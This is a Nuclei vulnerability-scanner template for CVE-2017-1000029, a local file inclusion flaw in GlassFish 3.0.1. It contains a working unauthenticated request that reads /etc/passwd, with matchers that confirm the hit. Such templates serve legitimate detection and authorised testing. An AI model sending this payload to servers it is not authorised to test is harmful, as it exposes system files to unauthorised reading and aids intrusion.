nuclei-templates/cves/2017/CVE-2017-1000029.yaml

id: CVE-2017-1000029

info:
  name: GlassFish Server Open Source Edition 3.0.1 - LFI
  author: 0x_Akoko
  severity: high
  description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to local file inclusion, which makes it possible to include arbitrary files on the server. The vulnerability can be exploited without any prior authentication.
  reference:
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
    - https://www.cvedetails.com/cve/CVE-2017-1000029
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-1000029
    cwe-id: CWE-200
  tags: cve,cve2017,glassfish,oracle,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/resource/file%3a///etc/passwd/"

    # Both matchers must hit: passwd-style root entry in the body and HTTP 200.
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200